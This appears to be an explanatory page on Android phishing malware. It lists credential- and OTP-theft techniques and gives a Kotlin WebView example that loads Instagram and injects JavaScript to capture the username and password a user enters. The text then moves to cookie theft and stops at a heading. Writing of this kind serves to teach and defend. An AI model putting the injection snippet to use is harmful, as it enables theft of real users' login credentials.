Phishing malware pretend to come from a trustworthy source, request a user’s authentication credentials or billing information, and sends the data to a third-party . This category also applies to code that intercept the transmission of user credentials in transit.

Common targets of phishing include banking credentials, credit card numbers, and online account credentials for social networks and games.

Special case of phishing is phone/SMS banking abuse, when apps try to send SMS or intercept OTPs.

Some of phishing techniques:

• Credentials Theft
  • JS injection
  • Cookie theft
  • Phishing windows
  • Overlay windows
  • Task hijacking
  • Accessibility abuse
  • Redirect outgoing calls
• OTP Theft
  • Incoming SMS
  • Status bar notification
  • Forward incoming calls

Credentials Theft

JS Injection

In this technique malware inject a JavaScript code snippet to already loaded WebView. With this technique attacker can hijack the credentials or other important data of user.

As an example when the malware opened by user, it inject a JavaScript code snippet to harvest the user entered credentials.

Code Example:

phishingWebView.webViewClient = object : WebViewClient(){
            override fun onPageFinished(view: WebView?, url: String?) {
                Log.d("blackberry", "OnFinishedCalled")
                val myJavaScript = "setTimeout(() => {document.querySelector(\\"#loginForm\\").onclick = () => {phishing.log(document.querySelector(\\"input[name='username']\\").value); phishing.log(document.querySelector(\\"input[name='password']\\").value)} }, 10000)"
                phishingWebView.evaluateJavascript(myJavaScript, null)}
phishingWebView.loadUrl("<https://www.instagram.com/>")

Cookie theft

It’s like JS Injection but instead of stealing username/password of user, the malware steal the browser cookie.

Phishing Window